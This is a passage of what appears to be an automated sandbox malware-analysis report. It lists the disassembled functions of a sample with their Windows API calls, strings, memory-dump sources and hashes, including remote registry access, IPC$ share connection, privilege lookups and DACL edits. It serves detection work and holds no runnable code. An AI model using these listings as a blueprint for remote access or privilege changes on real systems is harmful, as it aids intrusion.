                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 440038798-2785691316
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004610A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4136854206-1241985126
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 600699880-22481851
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3375834691-2160076837
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436F47 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memcmp.LIBCMT ref: 00437001
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0043704B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1446985595-805462909
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2907320926-3566645568
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046BEB2 Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ea233bc22287bc8aa4e874ae73e0c7e4a20e725d3166eba19f26b0fba6de6bf2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 33baa24a15bb30b806ffdc3d4c8c2128b8dbdbb38b4108e5c3e965d5e336c96e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea233bc22287bc8aa4e874ae73e0c7e4a20e725d3166eba19f26b0fba6de6bf2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E17471204200ABD714EF69CD85F2BB7E8AF88704F14891EF985DB381D779E941CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445F35 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00445FE1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446052
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446082
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004460E9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
